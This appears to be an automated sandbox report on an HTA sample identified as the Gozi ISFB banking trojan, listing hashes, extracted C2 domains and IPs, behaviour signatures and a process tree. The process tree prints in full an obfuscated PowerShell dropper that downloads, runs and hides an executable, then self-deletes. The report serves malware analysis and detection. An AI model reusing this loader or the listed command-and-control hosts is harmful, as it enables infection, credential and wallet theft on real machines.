Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-08-2022 01:33

General

  • Target

    55.hta

  • Size

    12KB

  • MD5

    26ace4f34d7b5df03722125fe5280d4c

  • SHA1

    7b9e7c2c60e66ec42061752d707ab70c3c84187a

  • SHA256

    e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad

  • SHA512

    5ad6cc4ae057d85a37f73b586ed0bbcf9857e7d918f302ba49772029d00bea6cb55d24f1249e33c0b2e05596fdaee813df0105032d96d91d56601b33b8555115

Malware Config

Extracted

Family

gozi_ifsb

Botnet

11111

C2

trackingg-protectioon.cdn1.mozilla.net

194.76.225.168

194.76.224.242

Attributes
  • base_path

    /fonts/

  • build

    250240

  • exe_type

    loader

  • extension

    .bak

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:876
      • C:\Users\Admin\AppData\Roaming\bartor.exe
        "C:\Users\Admin\AppData\Roaming\bartor.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4600
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4200
          • C:\Users\Admin\Downloads\WinZip.exe
            C:\Users\Admin\Downloads\WinZip.exe
            5⤵
            • Executes dropped EXE
            PID:2668
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3448
          • C:\Windows\SysWOW64\choice.exe
            choice /C Y /N /D Y /T 7
            5⤵
              PID:2200

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\bartor.exe

      Filesize

      494KB

      MD5

      0f2be4fe0362766dcf339d4c03326bc4

      SHA1

      69e26e9e75e8a8359d232d8e14318b9235e1a828

      SHA256

      2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529

      SHA512

      8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

    • C:\Users\Admin\AppData\Roaming\bartor.exe

      Filesize

      494KB

      MD5

      0f2be4fe0362766dcf339d4c03326bc4

      SHA1

      69e26e9e75e8a8359d232d8e14318b9235e1a828

      SHA256

      2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529

      SHA512

      8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

    • C:\Users\Admin\Downloads\WinZip.exe

      Filesize

      338KB

      MD5

      468042278a3e4841d3e33ccca10d99ca

      SHA1

      22532f37096a200d448420359c01bbebaaf6b820

      SHA256

      b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86

      SHA512

      4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

    • C:\Users\Admin\Downloads\WinZip.exe

      Filesize

      338KB

      MD5

      468042278a3e4841d3e33ccca10d99ca

      SHA1

      22532f37096a200d448420359c01bbebaaf6b820

      SHA256

      b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86

      SHA512

      4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

    • memory/876-139-0x0000000006900000-0x0000000006922000-memory.dmp

      Filesize

      136KB

    • memory/876-132-0x00000000055E0000-0x0000000005C08000-memory.dmp

      Filesize

      6.2MB

    • memory/876-136-0x00000000063D0000-0x00000000063EE000-memory.dmp

      Filesize

      120KB

    • memory/876-137-0x0000000007450000-0x00000000074E6000-memory.dmp

      Filesize

      600KB

    • memory/876-138-0x0000000006880000-0x000000000689A000-memory.dmp

      Filesize

      104KB

    • memory/876-130-0x0000000000000000-mapping.dmp

    • memory/876-140-0x0000000007AA0000-0x0000000008044000-memory.dmp

      Filesize

      5.6MB

    • memory/876-141-0x00000000086D0000-0x0000000008D4A000-memory.dmp

      Filesize

      6.5MB

    • memory/876-134-0x0000000005D10000-0x0000000005D76000-memory.dmp

      Filesize

      408KB

    • memory/876-133-0x0000000005430000-0x0000000005452000-memory.dmp

      Filesize

      136KB

    • memory/876-135-0x0000000005DF0000-0x0000000005E56000-memory.dmp

      Filesize

      408KB

    • memory/876-131-0x0000000002AC0000-0x0000000002AF6000-memory.dmp

      Filesize

      216KB

    • memory/2200-168-0x0000000000000000-mapping.dmp

    • memory/2668-151-0x00000000004E0000-0x00000000004EB000-memory.dmp

      Filesize

      44KB

    • memory/2668-147-0x0000000000000000-mapping.dmp

    • memory/2668-150-0x0000000000529000-0x000000000053A000-memory.dmp

      Filesize

      68KB

    • memory/2668-152-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/2668-153-0x0000000000610000-0x000000000061D000-memory.dmp

      Filesize

      52KB

    • memory/2668-156-0x0000000000529000-0x000000000053A000-memory.dmp

      Filesize

      68KB

    • memory/2668-157-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/3448-167-0x0000000000000000-mapping.dmp

    • memory/4200-146-0x0000000000000000-mapping.dmp

    • memory/4600-158-0x000000000BA70000-0x000000000C088000-memory.dmp

      Filesize

      6.1MB

    • memory/4600-159-0x000000000B4E0000-0x000000000B4F2000-memory.dmp

      Filesize

      72KB

    • memory/4600-160-0x000000000B610000-0x000000000B71A000-memory.dmp

      Filesize

      1.0MB

    • memory/4600-161-0x000000000B540000-0x000000000B57C000-memory.dmp

      Filesize

      240KB

    • memory/4600-162-0x000000000C090000-0x000000000C122000-memory.dmp

      Filesize

      584KB

    • memory/4600-163-0x000000000C2B0000-0x000000000C326000-memory.dmp

      Filesize

      472KB

    • memory/4600-164-0x000000000C470000-0x000000000C48E000-memory.dmp

      Filesize

      120KB

    • memory/4600-165-0x000000000CDE0000-0x000000000CFA2000-memory.dmp

      Filesize

      1.8MB

    • memory/4600-166-0x000000000D4E0000-0x000000000DA0C000-memory.dmp

      Filesize

      5.2MB

    • memory/4600-145-0x0000000000530000-0x00000000005B2000-memory.dmp

      Filesize

      520KB

    • memory/4600-142-0x0000000000000000-mapping.dmp